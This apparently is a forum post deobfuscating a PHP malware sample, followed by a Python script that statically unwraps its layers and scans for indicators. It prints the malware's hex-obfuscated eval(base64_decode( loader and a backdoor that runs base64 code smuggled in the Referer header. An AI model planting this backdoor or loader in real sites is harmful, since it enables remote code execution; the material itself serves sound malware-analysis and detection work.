I worked on it for a while, it's a base64_decode nightmare lol.
You are totally right, it is super hard to hide the eval(base64_decode( portion of PHP malware, this does so with:
Code:
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28
which translated out of hexadecimal is:
Code:
preg_replace("/.*/e","eval(base64_decode("
the /e in preg_replace has been deprecated and will usually throw an error, except for
If you break the gibberish at the preg_replace bit and attack the middle gibberish, which we know is base64, you get two new nested functions which factor down to three others:
Code:
$xtDE4yoxcmQ4S=base64_decode("YmFzZTY0X2RlY29kZQ=="); // decodes to base64_decode
$xjQCBpbTLvuG=base64_decode("c3RybGVu");              // decodes to strlen
$xmqSEAfSt8Y=base64_decode("Y2hy");                   // decodes to chr
$xDjQUHQSNMUgk=base64_decode("b3Jk");                 // decodes to ord
$x3U9UcEzb5Ar=base64_decode("Z3ppbmZsYXRl");          // decodes to gzinflate
and
Code:
$xWvIIZlBP5yOi=$x3U9UcEzb5Ar($xtDE4yoxcmQ4S($xWvIIZlBP5yOi));
$xUYZ0h2knwt1F=$xjQCBpbTLvuG($xWvIIZlBP5yOi);
and we'll do the third one in a bit.
We can use the equivalence of the first expression to clean up the second one here:
Code:
$xWvIIZlBP5yOi=gzinflate(base64_decode($xWvIIZlBP5yOi)); // $x3U9UcEzb5Ar and $xtDE4yoxcmQ4S substituted
$xUYZ0h2knwt1F=strlen($xWvIIZlBP5yOi);                  // $xjQCBpbTLvuG decodes to strlen above
$xWvIIZlBP5yOi is the function declared at the beginning of main.php, and we know now that it is encoded with gzdeflate and base64. I'll refer to this variable as dumbFunction, the main snippet of which is:
Code:
parse_str($_SERVER['HTTP_REFERER'], $a);   // query string of the Referer header parsed into $a
if (reset($a) == '12' && count($a) == 9) { // trigger: first value '12' and exactly nine parameters
    echo '<3456>';
    // last three parameters joined, spaces restored to '+', base64-decoded and eval'd
    eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));
    echo '</3456>';
}
We have one more chunk of base64 gibberish from the nested bit above:
Code:
$xxFOLVezAyy='';
for($xy2iVzhaTrUdw=0;$xy2iVzhaTrUdw<$xUYZ0h2knwt1F;$xy2iVzhaTrUdw++){
    $xxFOLVezAyy.=$xmqSEAfSt8Y(($xDjQUHQSNMUgk($xWvIIZlBP5yOi[$xy2iVzhaTrUdw])^1310981518));
}
eval($xxFOLVezAyy);
after cleaning that up with generic transpositions it looks something like:
Code:
$a = '';
for ($b = 0; $b < $c; $b++) {          // $c is strlen($dumbFunction)
    $a .= chr(ord($dumbFunction[$b]) ^ 1310981518);
}
eval($a);
(forgive me my formatting, I don't work in php much these days)
and this is about where I hit my brick wall. I had intended to find the spammy bit that I expected to be added to legitimate links, which I have not. I either overlooked some base64 in that rat's nest, or perhaps the chr((ord(dumbFunction[$b])^1310981518)) bit constructs a string to be added.
anyhow, it's super early so I'm going to grab some breakfast; maybe I'll get back to this in the afternoon, or maybe someone else will have some insight on it.
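As an added example (my own code, not the poster's and not anything from the malware or main.php), the following Python script peels the same layers statically, so the inner stage can be read without ever running it: it expands the \xHH string, resolves the base64-named function table, rewrites the $var(...) calls to their real names, and unwraps a blob in the order the post describes (base64, then gzinflate, then a per-byte XOR). One detail worth knowing: PHP's chr() keeps only the low 8 bits of its argument, so chr(ord($c) ^ 1310981518) is a single-byte XOR with 1310981518 & 0xFF = 142 (0x8E). The blob it analyses is a constructed sample built by the script itself; all function names and the indicator list are my assumptions, not part of the original file.

```python
"""Static peel of the layers described in the post: hex-escaped strings,
base64-named functions, base64 -> gzinflate -> per-byte XOR, then an
indicator scan of what comes out. Nothing here is ever eval'd."""
import base64
import re
import zlib

# The sample's loop does chr(ord($c) ^ 1310981518). PHP's chr() keeps only the
# low 8 bits of its argument, so the effective key is a single byte.
XOR_KEY = 1310981518
EFFECTIVE_KEY = XOR_KEY & 0xFF  # 142 == 0x8E


def decode_hex_escapes(literal: str) -> str:
    """Expand the \\xHH escapes of a PHP double-quoted string body."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), literal)


def resolve_function_table(php_src: str) -> dict:
    """Map each $var = base64_decode("...") assignment to the decoded name."""
    pat = re.compile(r'(\$\w+)\s*=\s*base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
    return {var: base64.b64decode(b64).decode("ascii")
            for var, b64 in pat.findall(php_src)}


def rename_calls(php_src: str, table: dict) -> str:
    """Rewrite $var(...) calls to name(...) using the resolved table."""
    for var, name in table.items():
        php_src = php_src.replace(var + "(", name + "(")
    return php_src


def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() consumes raw DEFLATE (no zlib/gzip header): wbits=-15."""
    return zlib.decompress(data, -15)


def gzdeflate(data: bytes) -> bytes:
    """PHP gzdeflate() counterpart, used only to build the constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return comp.compress(data) + comp.flush()


def xor_bytes(data: bytes, key: int) -> bytes:
    """Per-byte XOR with the low byte of key (what chr(ord() ^ key) amounts to)."""
    return bytes(b ^ (key & 0xFF) for b in data)


def unwrap_payload(b64_blob: str) -> str:
    """base64 -> gzinflate -> XOR each byte, the order the sample applies."""
    inflated = gzinflate(base64.b64decode(b64_blob))
    return xor_bytes(inflated, XOR_KEY).decode("latin-1")


def wrap_payload(php: str) -> str:
    """Inverse of unwrap_payload; only for constructing a test blob."""
    packed = gzdeflate(xor_bytes(php.encode("latin-1"), XOR_KEY))
    return base64.b64encode(packed).decode("ascii")


# Indicators taken from the post: eval(base64_decode(, the /e modifier on a
# preg_replace pattern, and a referer-driven parse_str. Assumed list, not canonical.
INDICATORS = {
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "preg_replace_e": re.compile(r"""preg_replace\s*\(\s*["']/.*?/[a-zA-Z]*e[a-zA-Z]*["']"""),
    "referer_parse_str": re.compile(r"parse_str\s*\(\s*\$_SERVER\[['\"]HTTP_REFERER['\"]\]"),
}


def find_indicators(php_src: str) -> list:
    """Names of every indicator pattern that matches the given PHP source."""
    return [name for name, pat in INDICATORS.items() if pat.search(php_src)]


# Constructed sample (not the real file): the name table quoted in the post plus
# a blob wrapped the same way the sample wraps its inner stage.
SAMPLE_TABLE_SRC = (
    '$xtDE4yoxcmQ4S=base64_decode("YmFzZTY0X2RlY29kZQ==");'
    '$xjQCBpbTLvuG=base64_decode("c3RybGVu");'
    '$x3U9UcEzb5Ar=base64_decode("Z3ppbmZsYXRl");'
)
SAMPLE_INNER = "parse_str($_SERVER['HTTP_REFERER'], $a); eval(base64_decode($a[0]));"
SAMPLE_BLOB = wrap_payload(SAMPLE_INNER)


def analyze_sample() -> dict:
    """Run the whole peel on the constructed sample and return each stage."""
    table = resolve_function_table(SAMPLE_TABLE_SRC)
    stage = rename_calls("$xWvIIZlBP5yOi=$x3U9UcEzb5Ar($xtDE4yoxcmQ4S($xWvIIZlBP5yOi));", table)
    inner = unwrap_payload(SAMPLE_BLOB)
    return {"table": table, "renamed": stage, "inner": inner,
            "indicators": find_indicators(inner)}


if __name__ == "__main__":
    for key, value in analyze_sample().items():
        print(key, "=>", value)
```

Because the unwrap is pure data transformation, the same functions can be pointed at the real blob pulled out of main.php; the output is the plaintext of the inner stage, which is where the referer-triggered eval lives and where any injected link text would have to be.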